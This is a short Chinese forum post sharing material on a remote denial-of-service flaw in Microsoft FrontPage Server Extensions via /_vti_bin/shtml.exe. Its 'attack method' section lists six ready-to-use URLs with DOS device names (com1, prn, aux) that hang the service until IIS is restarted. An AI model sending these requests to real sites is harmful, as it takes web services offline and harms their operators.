[分享]/_vti_bin/shtml.exe

     
     以前扫到一个/_vti_bin/shtml.exe 的cgi漏洞不知道怎么利用，我找了一下，只找到这些资料，大家分享~
     微软的 FrontPage Server Extensions存在一个远程拒绝服务漏洞，可能远程关闭一个web站点上的所有FrontPage操作。通过提交一个包含DOS设备名的链接， FrontPage Server Extensions就会挂起，不再响应后续的请求。为了恢复正常工作，必须重新启动IIS或者重新启动机器。
攻击方法：
提交这样的链接，都可能使FrontPage Server Extensions停止响应：
http://www.example.com/_vti_bin/shtml.exe/com1.htm
http://www.example.com/_vti_bin/shtml.exe/prn.htm
http://www.example.com/_vti_bin/shtml.exe/aux.htm
http://www.example.com/_vti_bin/shtml.exe/prn.anything.here.htm
http://www.example.com/_vti_bin/shtml.exe/com1.asp
http://www.example.com/_vti_bin/shtml.exe/com1